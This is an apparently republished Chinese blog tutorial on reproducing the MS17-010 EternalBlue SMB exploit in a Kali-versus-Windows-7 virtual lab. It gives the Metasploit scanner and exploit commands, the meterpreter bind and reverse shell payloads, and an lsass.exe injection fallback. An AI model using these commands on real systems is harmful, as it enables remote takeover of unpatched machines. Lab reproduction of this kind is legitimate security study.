MS17-010永恒之蓝验证

Posted 挖洞的土拨鼠

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了MS17-010永恒之蓝验证相关的知识,希望对你有一定的参考价值。

一、安装MSF,windows下安装也可以,直接安装kali也可以,我是kali是攻击主机,win7是靶机,都在虚拟机里。

1、windows下安装MSF请参考:http://blog.csdn.net/wangsy0202/article/details/51914748(https://www.metasploit.com/官网下载)

2、kali的安装请直接去官网下载:https://www.kali.org/downloads/

3、漏洞攻击文章请参考:https://bbs.ichunqiu.com/thread-23115-1-1.html

准备时候还是要说一下注意事项:

(1)请安装相关ruby插件:

安装过程是:打开msfconsole 然后输入命令:

1 gem install ruby_smb

(2)一定要搞清楚win7主机防火墙和共享服务配置445需要open 

(3)网络环境要搞清楚,是否有访问策略 是否有域认证等等,想明白了就像谁能发起连接。

#攻击机可以主动发起连接,请使用正向payload windows/x64/meterpreter/bind_tcp

#双向都可以主动发起连接的,请随意。(反向的windows/x64/meterpreter/reverse_tcp)

#双向都不可以的,或者攻击机不可以的那就别玩了。

(4)可以先扫描看看是否有漏洞

1 use auxiliary/scanner/smb/smb_ms17_010
2 set RHOSTS [targetip]
3 run

 

二、开始攻击:

1 msf exploit(ms17_010_eternalblue) > use exploit/windows/smb/ms17_010_eternalblue 
2 msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcp 
3 msf exploit(ms17_010_eternalblue) > set RHOST 192.168.177.129
4 msf exploit(ms17_010_eternalblue) > set LHOST 192.168.177.135
5 msf exploit(ms17_010_eternalblue) > exploit

 

 

 搞定收工

如果不行,麻烦加上这句:

1 set PROCESSINJECT   lsass.exe
2 set TARGETARCHITECTURE x64

 

以上是关于MS17-010永恒之蓝验证的主要内容,如果未能解决你的问题,请参考以下文章

MS17-010永恒之蓝漏洞利用

ms17-010永恒之蓝病毒复现

永恒之蓝MS17-010漏洞复现

永恒之蓝 MS17-010漏洞复现

MS17-010(永恒之蓝)漏洞复现和分析

永恒之蓝(ms17-010)漏洞简介及复现